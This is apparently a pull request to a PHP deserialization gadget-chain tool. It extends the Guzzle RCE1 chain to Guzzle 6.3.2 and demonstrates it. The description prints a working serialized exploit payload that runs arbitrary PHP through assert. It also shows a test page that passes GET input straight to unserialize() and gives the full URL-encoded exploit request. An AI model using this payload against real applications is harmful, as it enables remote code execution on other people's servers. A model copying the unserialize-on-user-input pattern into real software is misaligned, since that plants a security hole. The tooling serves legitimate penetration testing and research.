### PR TITLE
Update Guzzle/RCE/1 max supported version 6.3.2

### DIFF
--- a/gadgetchains/Guzzle/RCE/1/chain.php
+++ b/gadgetchains/Guzzle/RCE/1/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Guzzle;
 
 class RCE1 extends \PHPGGC\GadgetChain\RCE
 {
-    public $version = '6.0.0 <= 6.3.0';
+    public $version = '6.0.0 <= 6.3.2';
     public $vector = '__destruct';
     public $author = 'proclnas';
     public $informations = '';


### PR DESCRIPTION
Guzzle was updated to version 6.3.2 recently.

The RCE gadget is still present.

Tested with Guzzle 6.3.2 (installed with composer) on Ubuntu 16 `Apache/2.4.18 (Ubuntu)` `PHP 7.0.28-0ubuntu0.16.04.1`.

```bash
$ ./phpggc -s Guzzle/RCE1 'phpinfo();'
O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"%00GuzzleHttp\Psr7\FnStream%00methods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"%00GuzzleHttp\HandlerStack%00handler";s:10:"phpinfo();";s:30:"%00GuzzleHttp\HandlerStack%00stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:"%00GuzzleHttp\HandlerStack%00cached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}
```

```bash
$ cat /var/www/html/asdf.php 
<?php

require 'vendor/autoload.php';

unserialize($_GET['test']);

?>
```

```bash
http://127.0.0.1/asdf.php?test=O:24:%22GuzzleHttp\Psr7\FnStream%22:2:{s:33:%22%00GuzzleHttp\Psr7\FnStream%00methods%22;a:1:{s:5:%22close%22;a:2:{i:0;O:23:%22GuzzleHttp\HandlerStack%22:3:{s:32:%22%00GuzzleHttp\HandlerStack%00handler%22;s:10:%22phpinfo();%22;s:30:%22%00GuzzleHttp\HandlerStack%00stack%22;a:1:{i:0;a:1:{i:0;s:6:%22assert%22;}}s:31:%22%00GuzzleHttp\HandlerStack%00cached%22;b:0;}i:1;s:7:%22resolve%22;}}s:9:%22_fn_close%22;a:2:{i:0;r:4;i:1;s:7:%22resolve%22;}}
```

![phpinfo](https://user-images.githubusercontent.com/434827/38172633-1fd32700-35f3-11e8-86b5-300929cc3fff.png)
